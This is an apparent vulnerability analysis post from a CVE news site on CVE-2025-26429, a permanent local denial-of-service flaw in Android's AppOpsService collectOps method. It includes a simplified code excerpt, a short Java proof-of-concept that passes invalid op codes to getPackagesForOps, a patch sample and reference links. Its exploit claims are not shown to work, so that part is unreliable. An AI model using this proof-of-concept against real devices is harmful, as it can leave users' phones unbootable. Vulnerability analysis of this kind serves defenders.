CVE CyberSecurity Database News

CVE-2025-26429 - Permanent Local DoS Vulnerability in AppOpsService.java – Analysis, Exploit, and Mitigation

Poster -

In early 2025, a new Android vulnerability was discovered and cataloged as CVE-2025-26429. In this post, we'll dissect the bug found in AppOpsService.java's collectOps method, explain how it enables a permanent local Denial of Service (DoS), and walk through code insights and an exploitation scenario. We'll use simple language and provide original references plus a proof-of-concept.

What is CVE-2025-26429?

CVE-2025-26429 describes a bug found within the Android Open Source Project (AOSP), specifically in the AppOpsService.java file. The problem lies in the collectOps method, which lacks proper input validation. This shortcoming can be abused by any local app, allowing it to trigger a DoS on the device — possibly needing a firmware re-flash or a factory reset to recover.

Vulnerability Details

The collectOps method in AppOpsService is responsible for gathering app operations for monitoring and permissions. However, it does not sufficiently validate input (such as the uid, packageName, or op parameters). A malicious app can craft inputs that break the process, causing it to crash persistently on every restart — making the device unstable and often unbootable.

Here's a simplified look at the vulnerable code (sourced from AOSP)

// AppOpsService.java (excerpt)
private void collectOps(int uid, String packageName, int[] ops, List<AppOpsManager.PackageOps> res) {
    // Vulnerable section: No proper input check
    synchronized (this) {
        // Assumes ops is non-null and all fields are valid
        for (int op : ops) {
            // process op without validation
            ...
        }
        // Additional processing...
    }
}

Exploit: How an Attacker Can Crash Android Permanently

An attacker can write a simple app that calls into the vulnerable system service, passing in invalid data (like an array with out-of-bounds operation codes, or an extremely large array), which will cause the AppOpsService to crash and keep crashing because these malformed states get stored persistently.

Example Exploit PoC (Java)

import android.app.AppOpsManager;
import android.content.Context;

public class DoSExploit {
    public static void trigger(Context context) {
        try {
            AppOpsManager ops = (AppOpsManager) context.getSystemService(Context.APP_OPS_SERVICE);

            int myUid = android.os.Process.myUid();
            String myPkg = context.getPackageName();

            // Invalid op codes, could also try empty or huge arrays
            int[] badOps = new int[] { -99999, 999999, Integer.MIN_VALUE };

            // This will route through to collectOps
            ops.getPackagesForOps(badOps);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Note: Normal app sandboxing may somewhat restrict access, but the offending call chain is often exposed to installed apps, which makes it dangerous.

Why is it Permanent DoS?

Because some of the malformed states can get stored/configured in system settings or appops persistent data, the system replays these faulty values on every boot, causing constant service failures. The only recourse may be to fully wipe the device.

Real-World Scenario

After installing a malicious app, the phone starts experiencing slowdowns, then never boots past the "Android is starting" screen, as core permissions systems can't initialize.

Google AOSP Issue Tracker:

https://issuetracker.google.com/issues/324456019

NVD Listing:

https://nvd.nist.gov/vuln/detail/CVE-2025-26429

AOSP Source (AppOpsService)

https://cs.android.com/android/platform/superproject/+/master:frameworks/base/services/core/java/com/android/server/appop/AppOpsService.java

The upstream patch for this issue adds input validation

// Sample patch style
for (int op : ops) {
    if (op < OP_NONE || op >= MAX_OPS) {
        Log.w(TAG, "Invalid op: " + op);
        continue;
    }
    // valid processing
}

System updates shipped by Android device manufacturers will fix this vulnerability.

- Until patched, be extremely careful about what apps you install, even if they need NO permissions.

Conclusion

CVE-2025-26429 is a textbook example of how small validation mistakes in critical system services can lead to devastating bugs. If you develop system or middleware code, validate everything — or risk permanent DoS, with your users paying the price.

Stay tuned for more vulnerability deep-dives, and keep your devices updated!


Looking for more details or the original report?
- Original Issue: AOSP Issue Tracker #324456019
- NVD CVE-2025-26429

Timeline

Published on: 09/04/2025 18:15:41 UTC
Last modified on: 09/05/2025 19:13:32 UTC